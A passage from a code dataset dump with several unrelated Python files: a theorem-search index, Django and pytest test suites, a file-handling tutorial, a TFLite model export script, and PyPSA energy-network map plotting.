list is sufficiently large (greater than 100 or so), we expand that node. To do so,\nwe take the next location that must exist in the corresponding tree in a breadth-first manner\nand build a new dictionary node thingy based off of that.\n\nThis actually works very well with the expand_threshold of somewhere between 10 and 100.\nThat is, it has 10 percent of the time of subsequent verification as inefficency.\n\"\"\"\n\n\"\"\"\n# the following code was used to test it in an ipython notebook\nsearchproblem = SearchProblem(database)\n\n\np = random.choice(database.propositions.values())\nwhile len(p.entails_proof_steps)==0: p = random.choice(database.propositions.values())\nstatement = random.choice(p.entails_proof_steps)\nprint statement.tree.stringify()\nprint statement.prop.label, statement.prop.tree.stringify()\nprint prop_applies_to_statement(statement.tree, statement.prop, p)\nprint\ndef test_all_props(statement,proplist):\n labels = set()\n for prop in proplist:\n if not prop_applies_to_statement(statement.tree, prop, p)==None:\n labels.add(prop.label)\n #print prop.label, prop.tree.stringify(), prop_applies_to_statement(statement.tree, prop, p)\n return labels\n\nlabels = test_all_props(statement,database.propositions.itervalues())\n%timeit searchproblem.search(statement.tree,p)\n%timeit test_all_props(statement,database.propositions.itervalues())\n%timeit test_all_props(statement,[database.propositions[l] for l in labels])\n#print labels\nprint getsizeof(labels)\nlabels2 = searchproblem.search(statement.tree,p)\n#print labels2\nprint list(labels).sort()==labels2.sort()\nprint statement.prop.label in labels\n\"\"\"\n\nclass SearchProblem:\n def __init__(self,database, max_unconstrained_arity = None):\n self.start = ((),{}) # root node, empty dictionary\n self.wildcard = \"VAR\" #the placeholder for the wildcard value\n self.expand_threshold = 10;\n self.database = database\n\n for p in database.propositions.values():\n # if the unconstrained_arity is too hight, skip it\n # if not max_unconstrained_arity is None and p.unconstrained_arity()>max_unconstrained_arity: continue\n self.add(p)\n\n def add(self,p):\n current = self.start\n observed_positions = []\n\n while True:\n position, dictionary = current\n observed_positions.append(position)\n value = p.tree.value_at_position(position)\n if value in p.f: value = self.wildcard #variables count as wildcards\n\n # if the value isn't in the dictionary, add it\n if value not in dictionary:\n dictionary[value] = [p.label]\n return\n\n next_pair = dictionary[value]\n if type(next_pair) is list:\n next_pair.append(p.label)\n if len(next_pair) > self.expand_threshold:\n self.expand(current,observed_positions, value,p)\n return\n\n # otherwise continue to track along the search nodes until you find it.\n current = next_pair\n\n # I use the fact that the degree of any wildcard node is 0\n def expand(self,current, observed_positions, value,p):\n # expand the node at current[1][value]\n all_positions = p.tree.breadth_first_position_list()\n\n next_position = None\n for pos in all_positions:\n if pos not in observed_positions:\n next_position = pos\n break\n if next_position == None: #we've exhausted the entire tree\n return\n\n labels = current[1][value]\n\n current[1][value] = (next_position,{})\n\n for l in labels:\n self.add(self.database.propositions[l])\n\n # Performs the search in the tree. I'll use this as a untility function\n # for dealing with the actual matching: it's a pretty good filter, I hope\n def tree_match(self, tree, current = None):\n if current == None: current = self.start\n\n # if we ended up at a list, return everything\n if type(current) is list: return current\n\n position, dictionary = current\n value = tree.value_at_position(position)\n out = []\n if value in dictionary: out+= self.tree_match(tree,current=dictionary[value] )\n if self.wildcard in dictionary: out+= self.tree_match(tree,current=dictionary[self.wildcard])\n return out\n\n # given a statement, this will return all of the consistant propositions.\n # if max_proposition (=context.number) is set, the search\n # will only return propositions numbered *less* than that.\n def search(self,tree,context, max_proposition = None, vclass=None):\n restricted_labels = self.tree_match(tree)\n out = [l for l in restricted_labels if not prop_applies_to_statement(tree, self.database.propositions[l], context, vclass=vclass) is None]\n if not max_proposition == None:\n out = [l for l in out if self.database.propositions[l].number<max_proposition]\n return out\n\n def search_dictionary(self,tree,context, max_proposition = None, vclass=None):\n restricted_labels = self.tree_match(tree)\n out = {}\n for l in restricted_labels:\n if max_proposition is not None and self.database.propositions[l].number>=max_proposition:\n continue\n fit = prop_applies_to_statement(tree, self.database.propositions[l], context, vclass=vclass)\n if fit is not None:\n out[l]=fit\n return out\n","repo_name":"dwhalen/holophrasm","sub_path":"data_utils5.py","file_name":"data_utils5.py","file_ext":"py","file_size_in_byte":28707,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"53"} +{"seq_id":"29558969548","text":"from django.test import tag\nfrom functional_tests.base import FunctionalTest\nfrom projects.models import Project\nfrom guardian.shortcuts import assign_perm\n\n\n@tag('slow')\nclass TagCreateTestCase(FunctionalTest):\n def get_tag_create(self, proj):\n self.browser.get(self.live_server_url +\n f\"/projects/{proj.name}/tags/create/\")\n\n def test_user_enter_wrong_slug_in_url(self):\n self.not_matching_url_slug_helper(self.TAG_CREATE_URL)\n\n def test_annonymous_user_visits_tags_list(self):\n # CREATE SAMPLE RPOJECT.\n proj = Project.objects.create(name=\"project_1\")\n # Annonymus user can not visit tag create page.\n self.get_tag_create(proj)\n # He can not enter requested url.\n # He is still on home page of biodb.\n current_url = self.browser.current_url\n expected_url = self.live_server_url + f\"/accounts/login/?next=/projects/{proj.name}/tags/create/\"\n self.assertEqual(current_url, expected_url)\n\n def test_user_without_project_visit_permission_tries_to_get_tag_cerate_page(self):\n # CREATE SAMPLE PROJECT AND USER\n usr, proj = self.project_set_up_using_default_data()\n # User gets tag list. He doesn't have project visit permission.\n self.get_tag_create(proj)\n # He sees perrmision denied error.\n error = self.browser.find_element_by_css_selector(\"h1\")\n self.assertEqual(\n error.text, \"User doesn't have permission: can visit project\")\n\n def test_user_seas_statatic_elements_of_page(self):\n # CREATE SAMPLE PROJECT AND USER\n usr, proj = self.project_set_up_using_default_data()\n # ASSIGN PERMISION FOR USR TO PROJECT.\n assign_perm(\"projects.can_visit_project\", usr, proj)\n assign_perm(\"projects.can_modify_project\", usr, proj)\n # User gets tag list. He doesn't have project visit permission.\n self.get_tag_create(proj)\n # He seas satble element of page\n header = self.browser.find_element_by_css_selector(\"h1\")\n self.assertEqual(header.text, \"Create Tag:\")\n # He seas form to input name of tag.\n form = self.browser.find_element_by_css_selector(\"p\")\n self.assertEqual(form.text, \"Name:\")\n # He seas link back to sample page.\n link = self.browser.find_element_by_css_selector(\"a.link_back\")\n self.assertEqual(link.text, \"Return back to projects tag page\")\n link.click()\n self.assertEqual(self.browser.current_url,\n self.live_server_url + f\"/projects/{proj.name}/tags/\")\n\n def test_user_creates_tag(self):\n # CREATE SAMPLE PROJECT AND USER\n usr, proj = self.project_set_up_using_default_data()\n # ASSIGN PERMISION FOR USR TO PROJECT.\n assign_perm(\"projects.can_visit_project\", usr, proj)\n assign_perm(\"projects.can_modify_project\", usr, proj)\n # User gets tag list. He doesn't have project visit permission.\n self.get_tag_create(proj)\n # He input tah name into form.\n self.browser.find_element_by_css_selector(\"#id_name\").send_keys(\"tag\")\n # He clicks save button.\n self.browser.find_element_by_css_selector(\n \"input[type='submit']\").click()\n # He seas tag created in tag list.\n tags_list = self.browser.find_elements_by_css_selector(\"li\")\n self.assertEqual(len(tags_list), 1)\n\n def test_user_wants_to_create_tag_for_not_existing_project(self):\n # CREATE SAMPLE PROJECT AND USER\n usr, proj = self.project_set_up_using_default_data()\n # ASSIGN PERMISION FOR USR TO PROJECT.\n assign_perm(\"projects.can_visit_project\", usr, proj)\n # User gets undefined projects create tag page. Server throws error.\n request_url = \"/projects/random_project/tags/create/\"\n self.browser.get(self.live_server_url + request_url)\n error_header = self.browser.find_element_by_css_selector(\"h1\")\n error_text = self.browser.find_element_by_css_selector(\"p\")\n self.assertEqual(error_header.text, \"Not Found\")\n self.assertEqual(error_text.text,\n f\"The requested URL {request_url} was not found on this server.\")\n","repo_name":"Mateusz-Kirmuc/biodb_TDD","sub_path":"biodb/functional_tests/test_tag_create.py","file_name":"test_tag_create.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23897689587","text":"'''\r\n File Handling\r\nPython can be used to read and write data.\r\nAlso it supports reading and writing data to files.\r\n\r\nFile is a named location on disc to store related information.\r\nIt is used to permanently store data in a non-volatile memory(eg. hard disk).\r\n\r\nGenerally, we divide files in :\r\n1) Text file\r\n2) Binary file\r\n\r\nText file: Text files contains simple text (character data).\r\nEx. html, .c, .cpp, .java,....etc\r\nBinary file: Binary files contain binary data which is only readable by computer.\r\n\r\nTo perform file handling, we ned to perform these steps:\r\n1) Open file\r\n2) Read / Write file\r\n3) Close file\r\n\r\nStep 1: Opening a file: ---------------------------------------\r\n\r\nTo open a file, Python has a built-in function open().\r\nIt returns an object of file which is used with other functions.\r\nThe open function takes 2 arguments, the name of the file and mode of operation.\r\nSYNTAX: f = open(filename, mode)\r\n\r\nThe default file operations is read mode\r\nf = open(\"test.txt\") # open file in current directory\r\nf = open(\"C:Python22/demo.txt\") # specifying full path\r\n\r\nStep 2: Write or read or append data: ---------------------------------------\r\nNOTE: The default mode of the file is : Read\r\n\r\nWriting to a file: write() method is used to write a string into a file.\r\nReading forma file: read() method is used to read data from the file.\r\n\r\nThe read functions contain different methods:\r\n1) read() - return one big string\r\n2) readline - return one line at a time\r\n3) readlines - returns a list of lines\r\n\r\nAppend operations: used to append the data to existing file.\r\n\r\nStep 3: Close the file:\r\n\r\nClosing a file: close()\r\n\r\n'''\r\n\r\n'''\r\n\r\nModes for opening a file:\r\nr = Open a file for reading\r\nw = Opens a file for writing only. Overwrites the file if the file exists. \r\n If the file does not exist, it creates a new file for writing.\r\nr+= Opens for reading and writing(cannot truncate a file)\r\nw+= For writing and reading(can truncate a file)\r\na = Opens for appending a file at the end of the file without truncating it.\r\n Creates a new file if it does not exits.\r\nt = Open in text mode.\r\nb = Open in binary mode.\r\nx = Open for exclusive creation, failing if the file is already present.\r\n'''\r\n\r\nf = open(\"sample.txt\", \"w\") # if the file is not available then create the file and the write the data.\r\nf.write(\"Hi this is Aryan\")\r\nf.close()\r\n\r\nf = open(\"sample.txt\") # no mode is given so it opens the file in read mode by default.\r\nprint(f.read())\r\n\r\nprint(f.tell()) # this tell the current position of the cursor.\r\nprint(f.seek(5)) # moving the cursor to a specific location\r\nprint(f.read())\r\nf.close()\r\n\r\nf = open(\"sample.txt\", \"w\")\r\nf.write(\"List is a python object.\\nList is mutable.\\nModifications are allowed in list.\")\r\nf.close()\r\n\r\nf = open(\"sample.txt\")\r\nprint(f.readline()) # printing the text on the current line\r\nf.seek(45)\r\nprint(f.readline())\r\n\r\nf.seek(0) # moving the cursor to the beginning of the file\r\nprint(f.readlines()) # print the file contents in list format\r\n\r\nprint(\"*****************************************************\")\r\n\r\nf = open(\"sampleMyfile\", \"w\")\r\nf.write(\"My name is Aryan Shisode\\nI live in Pune\")\r\nf.close()\r\n","repo_name":"Mahesh2357/Python_Tutorials_23","sub_path":"File Handling (1).py","file_name":"File Handling (1).py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20610401991","text":"import argparse\nimport json\nimport logging\nimport os\nimport sys\nimport tempfile\n\nfrom nvidia_tao_tf1.core.export import keras_to_pb\nfrom nvidia_tao_tf1.core.export._quantized import check_for_quantized_layers, process_quantized_layers\nfrom nvidia_tao_tf1.cv.common.utils import CUSTOM_OBJS, model_io\n\nimport keras\nfrom keras.utils import CustomObjectScope\nimport tensorflow as tf\n\nlogger = logging.getLogger(__name__)\n\n\ndef reset_keras(fn):\n \"\"\"Simple function to define the keras decorator.\n \n This decorator clears any previously existing sessions\n and sets up a new session.\n \"\"\"\n def _fn_wrapper(*args, **kwargs):\n \"\"\"Clear the keras session.\"\"\"\n keras.backend.clear_session()\n set_keras_session()\n keras.backend.set_learning_phase(0)\n return fn(*args, **kwargs)\n return _fn_wrapper\n\n\ndef set_keras_session():\n \"\"\"Set the keras and Tensorflow sessions.\"\"\"\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n keras.backend.set_session(tf.Session(config=config))\n\n\n@reset_keras\ndef load_model(model_path: str, key=\"\"):\n \"\"\"Load the keras model.\n\n Args:\n model_path(str): Path to the model.\n key(str): The key to load the model.\n \"\"\"\n model = model_io(\n model_path,\n enc_key=key\n )\n return model\n\n\ndef resolve_path(path_string: str):\n \"\"\"Simple function to resolve paths.\n\n Args:\n path_string (str): Path to model string.\n \"\"\"\n return os.path.abspath(os.path.expanduser(path_string))\n\n\ndef save_model(model, output_path: str):\n \"\"\"Save the keras model.\n\n Args:\n model (keras.models.Model): Path to the keras model to be saved.\n output_path (str): Path to save the model.\n \"\"\"\n with CustomObjectScope(CUSTOM_OBJS):\n model.save(resolve_path(output_path))\n\n\ndef extract_model_scales(model,\n backend: str = \"onnx\"):\n \"\"\"Remove QDQ and Quantized* layers and extract the scales.\n\n Args:\n model (keras.model.Model): Model to inspect and extract scales.\n backend (str): \"onnx,uff\" model backend.\n \"\"\"\n model, tensor_scale_dict = process_quantized_layers(\n model, backend,\n calib_cache=None,\n calib_json=None)\n logger.info(\n \"Extracting tensor scale: {tensor_scale_dict}\".format(\n tensor_scale_dict=tensor_scale_dict\n )\n )\n logger.info(\"Extracting quantized scales\")\n os_handle, tmp_keras_model = tempfile.mkstemp(suffix=\".hdf5\")\n os.close(os_handle)\n with CustomObjectScope(CUSTOM_OBJS):\n model.save(tmp_keras_model)\n new_model = load_model(tmp_keras_model)\n return new_model\n\n\ndef convert_to_pb(model, output_node_names=None):\n \"\"\"Convert the model to graphdef protobuf.\n\n Args:\n model (keras.model.Model): Keras model object to serialize.\n output_node_names (dict): Name of the output nodes of the model.\n \n Returns:\n tmp_pb_file (str): Path to the protobuf file containing tf.graphDef.\n input_tensor_names (list): Names of the input tensors.\n output_tensor_names (list): Name of the output tensors.\n \"\"\"\n os_handle, tmp_pb_file = tempfile.mkstemp(\n suffix=\".pb\"\n )\n os.close(os_handle)\n input_tensor_names, out_tensor_names, _ = keras_to_pb(\n model,\n tmp_pb_file,\n None,\n custom_objects=CUSTOM_OBJS\n )\n if output_node_names:\n out_tensor_names = output_node_names\n return tmp_pb_file, input_tensor_names, out_tensor_names\n\n\ndef parse_command_line(cl_args=\"None\"):\n \"\"\"Parse command line args.\"\"\"\n parser = argparse.ArgumentParser(\n prog=\"export_tflite\",\n description=\"Export keras models to tflite.\"\n )\n parser.add_argument(\n \"--model_file\",\n type=str,\n default=\"\",\n help=\"Path to a model file.\"\n )\n parser.add_argument(\n \"--key\",\n type=str,\n default=\"\",\n help=\"Key to load the model.\"\n )\n parser.add_argument(\n \"--output_file\",\n type=str,\n default=\"\",\n help=\"Path to the output model file.\"\n )\n args = vars(parser.parse_args(cl_args))\n return args\n\n\ndef main(cl_args=None):\n \"\"\"Model converter.\"\"\"\n # Convert the model\n args = parse_command_line(cl_args=cl_args)\n input_model_file = args[\"model_file\"]\n output_model_file = args[\"output_file\"]\n key = args[\"key\"]\n tensor_scale_dict = None\n if not output_model_file:\n output_model_file = f\"{os.path.splitext(input_model_file)[0]}.tflite\"\n\n model = load_model(\n input_model_file, key\n )\n quantized_model = check_for_quantized_layers(model)\n logger.info(\"Quantized model: {quantized_model}\".format(quantized_model=quantized_model))\n if quantized_model:\n model, tensor_scale_dict = extract_model_scales(\n model, backend=\"onnx\"\n )\n tensor_scale_file = os.path.join(\n os.path.dirname(output_model_file),\n \"calib_scale.json\"\n )\n with open(tensor_scale_file, \"w\") as scale_file:\n json.dump(\n tensor_scale_dict, scale_file, indent=4\n )\n graph_def_file, input_arrays, output_arrays = convert_to_pb(\n model\n )\n\n # Convert the model to TFLite.\n converter = tf.lite.TFLiteConverter.from_frozen_graph(\n graph_def_file, input_arrays, output_arrays\n )\n converter.target_spec.supported_ops = [\n tf.lite.OpsSet.TFLITE_BUILTINS, # enable TensorFlow Lite ops.\n tf.lite.OpsSet.SELECT_TF_OPS # enable TensorFlow ops.\n ]\n tflite_model = converter.convert()\n with open(output_model_file, \"wb\") as tflite_file:\n model_size = tflite_file.write(tflite_model)\n print(\n f\"Output tflite model of size {model_size} bytes \"\n f\"was written at {output_model_file}\"\n )\n\n\nif __name__ == \"__main__\":\n main(cl_args=sys.argv[1:])\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"internal/tflite/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"22307528412","text":"import datetime\n\nimport pytest\nfrom dummyData.insert import mock_request\nfrom dummyData.static import *\nfrom httpx import AsyncClient\nfrom orjson import orjson\nfrom pytest_mock import MockerFixture\n\nfrom Shared.functions.helperFunctions import get_now_with_tz\nfrom Shared.networkingSchemas.destiny.lfgSystem import (\n AllLfgDeleteOutputModel,\n AllLfgOutputModel,\n LfgCreateInputModel,\n LfgOutputModel,\n LfgUpdateInputModel,\n UserAllLfgOutputModel,\n)\n\n\n@pytest.mark.asyncio\nasync def test_lfg(client: AsyncClient, mocker: MockerFixture):\n \"\"\"This tests all function in the file, because create() needs to be called first\"\"\"\n\n # =====================================================================\n # no lfg exists yet\n r = await client.get(f\"/destiny/lfg/{dummy_discord_guild_id}/get/all\")\n assert r.status_code == 200\n data = AllLfgOutputModel.parse_obj(r.json())\n assert data.events == []\n\n # =====================================================================\n # create\n input_model = LfgCreateInputModel(\n activity=\"Standing Around\",\n description=\"Test LFG Event\",\n start_time=datetime.datetime(day=10, month=10, year=2030, tzinfo=datetime.timezone.utc),\n max_joined_members=6,\n joined_members=[1, 2, dummy_discord_id],\n backup_members=[4],\n )\n r = await client.post(\n f\"/destiny/lfg/{dummy_discord_guild_id}/{dummy_discord_id}/create\", json=orjson.loads(input_model.json())\n )\n assert r.status_code == 200\n data = LfgOutputModel.parse_obj(r.json())\n assert_lfg_event_ok(data=data)\n assert data.message_id is None\n assert data.voice_channel_id is None\n\n # =====================================================================\n # update\n input_model = LfgUpdateInputModel(message_id=1, voice_channel_id=2)\n r = await client.post(\n f\"/destiny/lfg/{dummy_discord_guild_id}/{dummy_discord_id}/update/1\", json=orjson.loads(input_model.json())\n )\n assert r.status_code == 200\n data = LfgOutputModel.parse_obj(r.json())\n assert_lfg_event_ok(data=data)\n assert data.message_id == 1\n assert data.voice_channel_id == 2\n\n # =====================================================================\n # get all\n r = await client.get(f\"/destiny/lfg/{dummy_discord_guild_id}/get/all\")\n assert r.status_code == 200\n data = AllLfgOutputModel.parse_obj(r.json())\n assert len(data.events) == 1\n assert_lfg_event_ok(data=data.events[0])\n\n # =====================================================================\n # get\n r = await client.get(f\"/destiny/lfg/{dummy_discord_guild_id}/get/1\")\n assert r.status_code == 200\n data = LfgOutputModel.parse_obj(r.json())\n assert_lfg_event_ok(data=data)\n\n # =====================================================================\n # user get all\n r = await client.get(f\"/destiny/lfg/{dummy_discord_guild_id}/{dummy_discord_id}/get/all\")\n assert r.status_code == 200\n data = UserAllLfgOutputModel.parse_obj(r.json())\n assert len(data.joined) == 1\n assert len(data.backup) == 0\n assert_lfg_event_ok(data=data.joined[0], test_voice_category=False)\n\n # =====================================================================\n # delete\n # this needs to re-add the event a couple of times\n r = await client.delete(f\"/destiny/lfg/{dummy_discord_guild_id}/{dummy_discord_id_without_perms}/delete/1\")\n assert r.status_code == 409\n assert r.json()[\"error\"] == \"NoLfgEventPermissions\"\n\n r = await client.delete(f\"/destiny/lfg/{dummy_discord_guild_id}/{dummy_discord_id}/delete/1\")\n assert r.status_code == 200\n\n input_model = LfgCreateInputModel(\n activity=\"Standing Around\",\n description=\"Test LFG Event\",\n start_time=datetime.datetime(day=10, month=10, year=2030, tzinfo=datetime.timezone.utc),\n max_joined_members=6,\n joined_members=[1, 2, dummy_discord_id],\n backup_members=[4],\n )\n r = await client.post(\n f\"/destiny/lfg/{dummy_discord_guild_id}/{dummy_discord_id}/create\", json=orjson.loads(input_model.json())\n )\n assert r.status_code == 200\n data = LfgOutputModel.parse_obj(r.json())\n assert data.id == 2\n\n r = await client.delete(f\"/destiny/lfg/{dummy_discord_guild_id}/1/delete/2\")\n assert r.status_code == 200\n\n # =====================================================================\n # delete all\n r = await client.post(\n f\"/destiny/lfg/{dummy_discord_guild_id}/{dummy_discord_id}/create\", json=orjson.loads(input_model.json())\n )\n assert r.status_code == 200\n data = LfgOutputModel.parse_obj(r.json())\n assert data.id == 3\n\n r = await client.delete(f\"/destiny/lfg/{dummy_discord_guild_id}/delete/all\")\n assert r.status_code == 200\n data = AllLfgDeleteOutputModel.parse_obj(r.json())\n assert data.event_ids == [3]\n\n\ndef assert_lfg_event_ok(data: LfgOutputModel, test_voice_category: bool = True):\n \"\"\"Tests all attrs of the obj\"\"\"\n\n assert data.id == 1\n assert data.guild_id == dummy_discord_guild_id\n assert data.channel_id == dummy_persistent_lfg_channel_id\n assert data.author_id == dummy_discord_id\n assert data.activity == \"Standing Around\"\n assert data.description == \"Test LFG Event\"\n assert data.start_time == datetime.datetime(day=10, month=10, year=2030, tzinfo=datetime.timezone.utc)\n assert data.max_joined_members == 6\n assert data.joined_members == [1, 2, dummy_discord_id]\n assert data.backup_members == [4]\n assert data.creation_time.day == get_now_with_tz().day\n if test_voice_category:\n assert data.voice_category_channel_id == dummy_persistent_lfg_voice_category_id\n","repo_name":"TheDescend/elevatorbot","sub_path":"Backend/tests/endpoints/destiny/test_lfg.py","file_name":"test_lfg.py","file_ext":"py","file_size_in_byte":5709,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"38629630608","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 18 13:44:22 2021\n\n@author: Anders\n\"\"\"\n \n#%% European map plot\nimport pypsa, os\n#pandas package is very useful to work with imported data, time series, matrices ...\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib\nimport numpy as np\nimport cartopy.crs as ccrs\n\n#pathtest = r'C:\\Users\\ander\\OneDrive - Aarhus Universitet\\Maskiningenioer\\Kandidat\\3. semester\\PreProject Master\\Network files\\postnetworks/'\n#network_name = pathtest+'elec_s_37_lv1.0__Co2L0.1-solar+p3-dist0.5_2030.nc'\npath = r'C:/Users/ander/OneDrive - Aarhus Universitet/Maskiningenioer/Kandidat/3. semester/PreProject Master/WP4/Network_files_1hr/'\npathplot = r'C:/Users/ander/OneDrive - Aarhus Universitet/Maskiningenioer/Kandidat/3. semester/PreProject Master/WP4/Plots/map/'\nnetwork_name = path+'elec_s_37_lv1.0__H-T-H-solar+p3-dist1_2030mid.nc'\n\n\nn = pypsa.Network('elec_s_37_lv1.0__Co2L0.05-solar+p3-dist2_2030.nc')\n\n#%%\n#df=n.buses.loc[\"ES0 0 low voltage\"].rename('ES0 0')\n#df=df.to_frame().T\n#n.buses=pd.concat([df, n.buses])\n\n# This works:\n# n.generators['bus']=n.generators['bus'].replace({'ES0 0 low voltage':'ES0 0'})\n\n# This does not work :).\n#df=n.generators.loc['bus'][\"ES0 0 low voltage\"].rename('ES0 0')\n#df=df.to_frame().T\n#n.buses=pd.concat([df, n.buses])\n\n# Change bus name for solar rooftop to the same as for the other generators.\ncountries=n.generators['bus']\nfor i in countries:\n n.generators['bus']=n.generators['bus'].replace({str(i)+' low voltage':str(i)})\n\n\n\n#buselec = n.generators.assign(g = n.generators_t.p.mean()).groupby(['bus', 'carrier']).g.sum()\n#buselec = n.generators.assign(g = n.generators.p_nom.sum()).groupby(['bus', 'carrier']).g.sum()\nbuselec = n.generators.assign(g = n.generators_t.p.sum()).groupby(['bus', 'carrier']).g.sum()\n#buselec = n.generators_t.p_nom.groupby(['bus', 'carrier'])\n#buselec=buselec.drop('residential rural solar thermal', level='carrier')\n#buselec=buselec.drop('services rural solar thermal', level='carrier')\n#buselec=buselec.drop('urban rural solar thermal', level='carrier')\n#buselec=buselec.drop('urban central solar thermal', level='carrier')\n#buselec=buselec.drop('services urban decentral solar thermal', level='carrier')\n#buselec=buselec.drop('residential urban decentral solar thermal', level='carrier')\n#buselec=buselec.drop('ror', level='carrier')\n#buselec=buselec.drop('uranium', level='carrier')\n#buselec=buselec.drop('oil', level='carrier')\n#buselec=buselec.drop('gas', level='carrier')\n#buselec=buselec.drop('lignite', level='carrier')\n#buselec=buselec.drop('coal', level='carrier')\n# buselec=buselec.drop('offwind-ac', level='carrier')\n# buselec=buselec.drop('offwind-dc', level='carrier')\n# buselec=buselec.drop('offwind', level='carrier')\n# buselec=buselec.drop('solar', level='carrier')\n# buselec=buselec.drop('solar rooftop', level='carrier')\n\nbusline = n.storage_units.assign(g = n.storage_units_t.p.sum()).groupby(['bus', 'carrier']).g.sum().filter(like=\"hydro\")\nbuslink = -n.links.assign(g = n.links_t.p1.sum()).groupby(['bus1', 'carrier']).g.sum().filter(like=\"GT\")\nbuselec = buselec.append(busline)\nbuselec = buselec.append(buslink)\n\n#color={'onwind':'#235ebc','offwind':'#6895dd','offwind-ac':'#6895dd','offwind-dc':'#6895dd','solar':'#f9d002','solar rooftop':'#ffea80','gas':'r'}\ncolor={'onwind':'#235ebc','offwind':'#6895dd','offwind-ac':'#6895dd','offwind-dc':'#6895dd','solar':'#f9d002','solar rooftop':'#ffea80'\n ,'ror':'#78AB46','hydro':'#3B5323','PHS':'g','gas':'brown','OCGT':'brown','CCGT':'brown','uranium':'r','oil':'#B5A642','coal':'k','residential rural solar thermal':'m',\n 'services rural solar thermal':'m','urban rural solar thermal':'g','residential urban decentral solar thermal':'g','lignite':'g',\n 'urban central solar thermal':'m','nuclear':'r','services urban decentral solar thermal':'m'}\n\n\nfrom matplotlib.patches import Circle, Ellipse\nimport matplotlib.patches as mpatches\n\n\n\n#n.buses.loc[\"ES0 0 low voltage\"]\n#n.buses.loc[\"ES0 0 low voltage\",[\"x\",\"y\"]] = [-3.43431,40.6009]\n#n.buses.loc[\"ES0 0 low voltage\",['carrier']] = ['AC']\n\n#n.buses.loc[\"ES0 0 low voltage\",['Name']] = ['ES0 0'] \n \n#Filtering of the links that are DC Links\nn.links=n.links.loc[n.links['carrier'] == 'DC']\n \n \nfig, ax = plt.subplots(subplot_kw={\"projection\":ccrs.PlateCarree()})\nn.plot(bus_sizes=buselec/8e7, \n bus_colors=color,\n color_geomap=True,\n boundaries=([-12,30,36,65]),\n #boundaries=([-10.2, 29, 35, 64]),\n branch_components=[\"Link\",\"Line\"],# [\"Link\",\"Line\"] this one decides if we want the links \n ax=ax)\n\n#ax.set_title('Produced energy by wind and solar')\ngas_patch = mpatches.Patch(color='Brown', label=' Gas')\nhydro_patch = mpatches.Patch(color='#3B5323', label=' Hydro')\nror_patch = mpatches.Patch(color='#78AB46', label=' Ror')\nonwind_patch = mpatches.Patch(color='#235ebc', label=' Onwind')\noffwind_patch = mpatches.Patch(color='#6895dd', label=' Offwind')\nsolar_patch = mpatches.Patch(color='#f9d002', label=' Solar Utility')\nsolarroof_patch = mpatches.Patch(color='#ffea80', label=' Solar Rooftop')\n#ror_patch = mpatches.Patch(color='#78AB46', label=' Run-of-river')\nax.legend(handles=[onwind_patch,offwind_patch,solar_patch,solarroof_patch,gas_patch,hydro_patch,ror_patch],\n loc=\"lower right\", bbox_to_anchor=(1.32, 0.5),#bbox_to_anchor=(0.01, 0.79),\n framealpha=0, #color of the background of the legend\n handletextpad=0., columnspacing=0.5, ncol=1, title=None)\n\n\npath = r'C:\\Users\\Mads Jorgensen\\OneDrive - Aarhus Universitet\\Dokumenter\\3. Semester Kandidat\\01_PreProject\\LateX\\Pictures'\nname = r'\\02_map_dist2'\nplt.savefig(path+name,dpi=300, bbox_inches='tight')\n\n\n#%% Using the correct plot with transmission line expansion\n\nloading = (n.lines_t.p0.abs().mean().sort_index() / (n.lines.s_nom_opt*n.lines.s_max_pu).sort_index()).fillna(0.)\n\nfig,ax = plt.subplots(subplot_kw = {\"projection\": ccrs.PlateCarree()})\n\nn.plot(bus_sizes=buselec/8e7, \n bus_colors=color,\n ax=ax,\n #bus_colors='gray',\n branch_components=[\"Line\"],\n line_widths=n.lines.s_nom_opt/9e3,\n line_colors='purple',\n line_cmap=plt.cm.viridis,\n color_geomap=True,\n boundaries=([-12,30,36,65]))\n #bus_sizes=0.1)\n#ax.set_title('Produced energy by wind and solar')\ngas_patch = mpatches.Patch(color='Brown', label=' Gas')\nhydro_patch = mpatches.Patch(color='#3B5323', label=' Hydro')\nror_patch = mpatches.Patch(color='#78AB46', label=' Ror')\nonwind_patch = mpatches.Patch(color='#235ebc', label=' Onwind')\noffwind_patch = mpatches.Patch(color='#6895dd', label=' Offwind')\nsolar_patch = mpatches.Patch(color='#f9d002', label=' Solar Utility')\nsolarroof_patch = mpatches.Patch(color='#ffea80', label=' Solar Rooftop')\n#ror_patch = mpatches.Patch(color='#78AB46', label=' Run-of-river')\nax.legend(handles=[onwind_patch,offwind_patch,solar_patch,solarroof_patch,gas_patch,hydro_patch,ror_patch],\n loc=\"lower right\", bbox_to_anchor=(1.32, 0.5),#bbox_to_anchor=(0.01, 0.79),\n framealpha=0, #color of the background of the legend\n handletextpad=0., columnspacing=0.5, ncol=1, title=None)\n\npath = r'C:\\Users\\Mads Jorgensen\\OneDrive - Aarhus Universitet\\Dokumenter\\3. Semester Kandidat\\01_PreProject\\LateX\\Pictures'\nname = r'\\02_map_dist2'\nplt.savefig(path+name,dpi=300, bbox_inches='tight')\n\n","repo_name":"MadsJoergensen/PreProject_2021","sub_path":"europemapplot.py","file_name":"europemapplot.py","file_ext":"py","file_size_in_byte":7430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6604403242","text":"import matplotlib.pyplot as plt\r\nimport matplotlib.patches as patches\r\n\r\nfig, ax = plt.subplots()\r\n\r\n# Drawing the tables (as rectangles)\r\ntable1 = patches.Rectangle((0.2, 0.2), 0.2, 0.2, fill=None)\r\ntable2 = patches.Rectangle((0.6, 0.2), 0.2, 0.2, fill=None)\r\n\r\n# Adding the tables to the 